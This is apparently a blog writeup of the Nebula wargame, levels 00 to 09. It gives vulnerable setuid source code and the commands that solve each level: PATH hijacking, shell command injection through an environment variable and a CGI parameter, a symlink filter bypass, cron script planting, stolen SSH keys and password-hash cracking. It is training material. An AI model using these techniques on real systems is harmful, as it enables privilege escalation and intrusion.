Fork me on GitHub

Nebula

发表于 | 更新于 | 分类于

Nebula Writeup

level00

About

This level requires you to find a Set User ID program that will run as the “flag00” account. You could also find this by carefully looking in top level directories in / for suspicious looking directories.

Alternatively, look at the find man page.

To access this level, log in as level00 with the password of level00.

Key Points

  • find
  • uid

Writeup

  • Step 1
level00@nebula:~$ id flag00
uid=999(flag00) gid=999(flag00) groups=999(flag00)
  • Step 2
level00@nebula:~$ find / -uid 999 2>/dev/null
/bin/.../flag00
/home/flag00
/home/flag00/.bash_logout
/home/flag00/.bashrc
/home/flag00/.profile
/rofs/bin/.../flag00
/rofs/home/flag00
/rofs/home/flag00/.bash_logout
/rofs/home/flag00/.bashrc
/rofs/home/flag00/.profile
  • Step 3
level00@nebula:~$ /bin/.../flag00 
Congrats, now run getflag to get your flag!
flag00@nebula:~$ getflag
You have successfully executed getflag on a target account

level 01

About

There is a vulnerability in the below program that allows arbitrary programs to be executed, can you find it?

To do this level, log in as the level01 account with the password level01. Files for this level can be found in /home/flag01.

SourceCode

#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>
int main(int argc, char **argv, char **envp)
{
  gid_t gid;
  uid_t uid;
  gid = getegid();
  uid = geteuid();
  setresgid(gid, gid, gid);
  setresuid(uid, uid, uid);
  system("/usr/bin/env echo and now what?");
}

Key Points

Writeup

  • Step 1

level01@nebula:~$ ln -s /bin/getflag echo

  • Step 2

level01@nebula:~$ export PATH=/home/level01:$PATH

  • Step 3
level01@nebula:~$ ../flag01/flag01 
You have successfully executed getflag on a target account

level02

About

There is a vulnerability in the below program that allows arbitrary programs to be executed, can you find it?

To do this level, log in as the level02 account with the password level02. Files for this level can be found in /home/flag02.

SourceCode

#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>
int main(int argc, char **argv, char **envp)
{
  char *buffer;
  gid_t gid;
  uid_t uid;
  gid = getegid();
  uid = geteuid();
  setresgid(gid, gid, gid);
  setresuid(uid, uid, uid);
  buffer = NULL;
  asprintf(&buffer, "/bin/echo %s is cool", getenv("USER"));
  printf("about to call system(\"%s\")\n", buffer);
  
  system(buffer);
}

Key Points

  • 环境变量

Writeups

  • Step 1

level02@nebula:~$ export USER="&& /bin/getflag"

level03

About

Check the home directory of flag03 and take note of the files there.

There is a crontab that is called every couple of minutes.

To do this level, log in as the level03 account with the password level03. Files for this level can be found in /home/flag03.

SourceCode

#!/bin/sh
for i in /home/flag03/writable.d/* ; do
    (ulimit -t 5; bash -x "$i")
    rm -f "$i"
done

Key Points

Writeups

  • /home/flag03/writable.d 下建一个可执行脚本
level03@nebula:/home/flag03/writable.d$ echo "/bin/getflag > /tmp/flag" > test.sh

PS:

  • sudo ls /var/spool/cron/crontabs

level04

About

This level requires you to read the token file, but the code restricts the files that can be read. Find a way to bypass it :)

To do this level, log in as the level04 account with the password level04. Files for this level can be found in /home/flag04.

SourceCode

#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>
#include <fcntl.h>
int main(int argc, char **argv, char **envp)
{
  char buf[1024];
  int fd, rc;
  if(argc == 1) {
      printf("%s [file to read]\n", argv[0]);
      exit(EXIT_FAILURE);
  }
  if(strstr(argv[1], "token") != NULL) {
      printf("You may not access '%s'\n", argv[1]);
      exit(EXIT_FAILURE);
  }
  fd = open(argv[1], O_RDONLY);
  if(fd == -1) {
      err(EXIT_FAILURE, "Unable to open %s", argv[1]);
  }
  rc = read(fd, buf, sizeof(buf));
  
  if(rc == -1) {
      err(EXIT_FAILURE, "Unable to read fd %d", fd);
  }
  write(1, buf, rc);
}

Key Points

  • strstr

Writeups

  • Step 1
level04@nebula:/tmp$ ln -s /home/flag04/token flag04
level04@nebula:/tmp$ /home/flag04/flag04 /tmp/flag04
06508b5e-8909-4f38-b630-fdb148a848a2
  • Step 2
nebula@nebula:~$ su flag04
Password: 
sh-4.2$ getflag
You have successfully executed getflag on a target account

level05

About

Check the flag05 home directory. You are looking for weak directory permissions

To do this level, log in as the level05 account with the password level05. Files for this level can be found in /home/flag05.

Key Points

  • ssh

Writeups

  • Step 1

level05@nebula:/home/flag05/.backup$ tar xvf backup-19072011.tgz -C /tmp/

  • Step 2
level05@nebula:~$ cp -r /tmp/.ssh/ ~
level05@nebula:~$ ssh flag05@localhost

level06

About

The flag06 account credentials came from a legacy unix system.

To do this level, log in as the level06 account with the password level06. Files for this level can be found in /home/flag06.

Key Points

Witeups

  • Step 1

copy出/etc/passwd文件

  • Step 2
➜  Desktop john passwd 
Using default input encoding: UTF-8
Loaded 1 password hash (descrypt, traditional crypt(3) [DES 128/128 AVX-16])
Press 'q' or Ctrl-C to abort, almost any other key for status
hello            (flag06)
1g 0:00:00:00 DONE 2/3 (2017-06-25 15:41) 25.00g/s 18750p/s 18750c/s 18750C/s 123456..marley
Use the "--show" option to display all of the cracked passwords reliably
Session completed

level07

About

The flag07 user was writing their very first perl program that allowed them to ping hosts to see if they were reachable from the web server.

To do this level, log in as the level07 account with the password level07. Files for this level can be found in /home/flag07.

SourceCode

#!/usr/bin/perl
use CGI qw{param};
print "Content-type: text/html\n\n";
sub ping {
  $host = $_[0];
  print("<html><head><title>Ping results</title></head><body><pre>");
  @output = `ping -c 3 $host 2>&1`;
  foreach $line (@output) { print "$line"; }
  print("</pre></body></html>");
  
}
# check if Host set. if not, display normal page, etc
ping(param("Host"))

Key Points

Writeups

127.0.0.1;getflag

level08

About

World readable files strike again. Check what that user was up to, and use it to log into flag08 account.

To do this level, log in as the level08 account with the password level08. Files for this level can be found in /home/flag08.

key Points

7f –> del

Writeups

000000D5  01                                               .
000000D6  00 0d 0a 50 61 73 73 77  6f 72 64 3a 20          ...Passw ord:
000000B9  62                                               b
000000BA  61                                               a
000000BB  63                                               c
000000BC  6b                                               k
000000BD  64                                               d
000000BE  6f                                               o
000000BF  6f                                               o
000000C0  72                                               r
000000C1  7f                                               .
000000C2  7f                                               .
000000C3  7f                                               .
000000C4  30                                               0
000000C5  30                                               0
000000C6  52                                               R
000000C7  6d                                               m
000000C8  38                                               8
000000C9  7f                                               .
000000CA  61                                               a
000000CB  74                                               t
000000CC  65                                               e
000000CD  0d                                               .

Password is backd00Rmate

level09

ABout

There’s a C setuid wrapper for some vulnerable PHP code…

To do this level, log in as the level09 account with the password level09. Files for this level can be found in /home/flag09.

SourceCode

<?php
function spam($email)
{
  $email = preg_replace("/\./", " dot ", $email);
  $email = preg_replace("/@/", " AT ", $email);
  
  return $email;
}
function markup($filename, $use_me)
{
  $contents = file_get_contents($filename);
  $contents = preg_replace("/(\[email (.*)\])/e", "spam(\"\\2\")", $contents);
  $contents = preg_replace("/\[/", "<", $contents);
  $contents = preg_replace("/\]/", ">", $contents);
  return $contents;
}
$output = markup($argv[1], $argv[2]);
print $output;
?>

key Points